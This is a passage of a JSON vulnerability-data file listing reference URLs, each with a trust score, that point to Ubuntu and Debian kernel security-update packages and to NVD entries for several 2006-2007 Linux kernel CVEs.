        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.32_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.41_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-29-386-di_2.6.15-29.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-29-powerpc64-smp-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-29-powerpc-di_2.6.15-29.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-29-sparc64-di_2.6.15-29.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-686_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4133"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-itanium_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power4_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-generic_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-powerpc_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-patch-2.6.8-s390_2.6.8-6sarge1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-powerpc-smp_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-6054"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-4-sparc32_2.6.8-16sarge1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-k7-smp_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-4-generic_2.6.8-17sarge1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-4-s390x_2.6.8-6sarge1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-mckinley_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-17sarge1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power3-smp_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-64_2.6.8-7sarge1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mvme147_2.6.8-5sarge1_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-amiga_2.6.8-5sarge1_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-13sarge1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-4-smp_2.6.8-17sarge1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-itanium-smp_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-headers-2.6.8-4_2.6.8-6sarge1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-5823"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-686_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-64_2.6.8-7sarge1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-64-smp_2.6.8-7sarge1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-s390_2.6.8-6sarge1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-m68k_2.6.8-5sarge1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-4-s390-tape_2.6.8-6sarge1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4-sparc64-smp_2.6.8-16sarge1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-17sarge1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-16sarge1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power3_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-17sarge1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-17sarge1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-hppa_2.6.8-7sarge1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2172"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-k7-smp_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-powerpc_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-tree-2.6.8_2.6.8-17sarge1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-hp_2.6.8-5sarge1_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-headers-2.6.8-4_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-sun3_2.6.8-5sarge1_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-powerpc-smp_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power3_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-mckinley-smp_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-4-s390_2.6.8-6sarge1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-m68k_2.6.8-5sarge1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley-smp_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-4-smp_2.6.8-17sarge1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3105"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-32-smp_2.6.8-7sarge1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-686-smp_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge8.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-1353"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-k7_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6206"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-17sarge1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mac_2.6.8-5sarge1_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4-sparc64_2.6.8-16sarge1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-4-sparc64-smp_2.6.8-16sarge1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-k7_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-mckinley-smp_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-4-generic_2.6.8-17sarge1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley-smp_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power4-smp_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-16sarge1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-hppa_2.6.8-7sarge1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-generic_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-15sarge1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-17sarge1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-atari_2.6.8-5sarge1_m68k.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-4-sparc64_2.6.8-16sarge1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium-smp_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-7203"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power3-smp_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-itanium-smp_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-15sarge1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-17sarge1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-32_2.6.8-7sarge1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-patch-debian-2.6.8_2.6.8-17sarge1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4_2.6.8-7sarge1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power4_2.6.8-13sarge1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-386_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-itanium_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-generic_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-686-smp_2.6.8-17sarge1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-32-smp_2.6.8-7sarge1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-mckinley_2.6.8-15sarge1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-17sarge1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-13sarge1.dsc"
      },
      {
        "trust": 0.1,
